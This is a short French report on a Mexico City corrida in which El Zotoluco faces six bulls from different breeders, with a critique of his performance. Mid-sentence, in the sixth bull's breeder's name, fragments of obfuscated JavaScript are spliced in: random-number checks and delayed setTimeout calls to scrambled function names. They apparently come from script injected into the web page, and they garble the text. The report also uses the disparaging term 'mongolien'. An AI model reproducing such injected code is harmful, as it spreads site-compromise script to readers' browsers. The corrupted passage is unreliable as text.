ARENES DE MEXICO LE SEUL CONTRE SIX DE ZOTOLUCO

Avec une bonne entrée côté public, El Zotoluco affrontait six toros à La Monumental de Mexico.

Le premier toro appartint au fer de José Marrón, il fut noble et invalide ; le second, de Javier Garfias, avait de la classe ; le troisième, de Jaral de Peñas, fut encasté ; le quatrième, de Montecristo fut plutôt manso et décomposé ; le cinquième, de Xajay, brave et avec de la classe ; et le sixième, de Fernandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando de la Mora, noble et sans race.

Les cinq premiers furent bien présentés avec de la variété dans les robes ; le dernier, un peu gros et sans trapio, paraissait mongolien.

Devant un tel étalage, Eulalio López « Zotoluco » officia en tant qu’infirmier avec les invalides, il ne se confia pas complètement avec le toro encaste de Jaral de Peñas et fit une bonne faena au brave toro de Xajay. Le maestro montra qu’il a du métier, mais il ne s’engagea pas suffisamment avec le seul toro offensif et cette corrida n’enleva ni rajouta rien à sa longue carrière de matador. La maestria toute seule n’est pas très parlante.

Les commentaires sont fermés.